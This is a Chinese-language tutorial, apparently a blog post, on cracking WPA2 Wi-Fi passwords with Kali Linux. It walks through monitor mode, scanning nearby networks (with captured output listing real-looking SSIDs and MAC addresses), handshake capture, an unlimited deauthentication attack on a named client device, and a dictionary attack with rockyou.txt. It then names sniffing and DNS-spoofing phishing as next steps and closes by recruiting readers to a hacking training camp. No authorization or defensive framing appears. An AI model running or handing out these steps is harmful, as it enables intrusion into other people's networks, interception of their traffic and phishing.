WI-FI密码破解

黑客是如何破解WI-FI密码的(黑客是如何破解WI-FI密码的)(1)

工具kali linux 操作系统,一款黑客专用操作系统。

1、开启无线网络监听模式

获取无线网卡名 使用命令:

sudo ifconfig

黑客是如何破解WI-FI密码的(黑客是如何破解WI-FI密码的)(2)

开启无线网络监听使用命令 :

sudo airmon-ng start wlan0

黑客是如何破解WI-FI密码的(黑客是如何破解WI-FI密码的)(3)

查看无线监听模式是否成功

黑客是如何破解WI-FI密码的(黑客是如何破解WI-FI密码的)(4)

2、获取周围无线网络信息主要(路由器mac地址、信道等)

sudo airodump-ng wlan0mon

CH 1 ][ Elapsed: 30 s ][ 2020-07-24 09:56 BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID 1C:D5:E2:EF:87:B8 -65 15 0 0 11 130 CCMP PSK ChinaNet-jdFm B4:DE:DF:35:00:90 -65 16 0 0 7 130 WPA2 CCMP PSK ChinaNet-6YNg C0:B4:7D:2F:88:D5 -69 16 0 0 11 360 WPA2 CCMP PSK <length: 0> C0:B4:7D:2F:88:D9 -68 13 0 0 11 360 WPA2 CCMP PSK <length: 0> C0:B4:7D:2F:88:D4 -69 15 0 0 11 360 WPA2 CCMP PSK welljoint 90:47:3C:52:6A:11 -68 11 0 0 4 130 WPA2 CCMP PSK CMCC-NG7F 90:47:3C:35:53:D9 -66 14 2 0 3 270 WPA2 CCMP PSK CMCC-qiangtou D8:32:14:F7:F4:91 -71 1 1 0 6 270 WPA2 CCMP PSK HA 0C:6A:BC:01:CE:97 -77 1 0 0 5 130 WPA2 CCMP PSK CMCC-S4GQ 90:47:3C:3C:11:79 -81 16 0 0 8 130 WPA2 CCMP PSK CMCC-9Pp3 04:95:E6:07:22:31 -81 13 0 0 2 130 WPA2 CCMP PSK Tenda_072230 FC:D7:33:CC:12:7C -84 7 0 0 1 405 WPA2 CCMP PSK Danke-202 BSSID STATION PWR Rate Lost Frames Notes Probes 90:47:3C:52:6A:11 96:B4:B1:A5:5A:AA -82 0 - 1e 0 4 90:47:3C:35:53:D9 8C:85:90:8A:5A:FD -46 0 -24e 0 9 90:47:3C:35:53:D9 50:D2:F5:D8:A0:B7 -68 2e- 1e 0 2 0C:6A:BC:01:CE:97 3E:30:06:E3:6D:C9 -82 0 - 1e 34 8 Quitting...

其中BSSID是路由器mac地址,CH是信道,记录这两个信息在抓包的时候会用到

3、抓取无线网络请求包

sudo airodump-ng -c 4 --bssid 90:47:3C:52:6A:11 -w ~/ wlan0mon

其中 -c表示信道,--bssid表示路由器mac地址 ,-w是保存位置

黑客是如何破解WI-FI密码的(黑客是如何破解WI-FI密码的)(5)

WPA handshake出现表示抓取请求包成功。

4、抓取wifi请求包需要断网攻击的配合

sudo aireplay-ng -0 0 -a 90:47:3C:52:6A:11 -c 96:B4:B1:A5:5A:AA wlan0mon

-0 断网攻击次数0表示无限次,-a表示路由器mac地址,-c 表示要攻击的断网设备

黑客是如何破解WI-FI密码的(黑客是如何破解WI-FI密码的)(6)

5、暴力破解wifi密码

sudo aircrack-ng -w /usr/share/wordlists/rockyou.txt /home/kali/-03.cap

-w wifi密码字典位置 后面是抓取的wifi网络请求包的位置

黑客是如何破解WI-FI密码的(黑客是如何破解WI-FI密码的)(7)

密码破解之后黑客能做什么

1、嗅探--简单的说就是获取所有的流量信息,如你登陆哪个网站的账户、浏览了什么视频等。

2、DNS欺骗--就是可以自己伪造一个百度页面,让你的设备访问baidu.com域名时,访问到它伪造的页面进行网络钓鱼。

下一节内容会详细介绍。黑客入侵了WIFI之后能做什么,我们又该如何防御。

关注并私信我,加入我的训练营,学习更多黑客技术。

,